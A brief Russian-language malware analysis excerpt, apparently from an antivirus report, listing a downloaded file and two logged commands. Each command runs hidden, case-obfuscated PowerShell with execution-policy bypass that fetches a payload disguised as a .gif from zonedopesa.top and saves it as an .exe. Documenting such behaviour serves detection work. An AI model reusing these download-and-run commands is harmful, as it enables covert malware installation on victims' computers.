Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWeRShEll.Exe -EXeCtIONPoLicy bYpASs -nOPRofILE -WinDOWstylE hIDden (NeW-ObjEcT sySTEm.net.WEbClIeNt).dowNlOADFile('http://www.zonedopesa.top/read.php?f=1.gif','%aPpData%.eXE'...
- '<SYSTEM32>\cmd.exe' /C "PoWeRShEll.Exe -EXeCtIONPoLicy bYpASs -nOPRofILE -WinDOWstylE hIDden (NeW-ObjEcT sySTEm.net.WEbClIeNt).dowNlOADFile('http://www.zonedopesa.top/read.php?f=1.gif','%aPpData%.eXE'...' (со скрытым окном)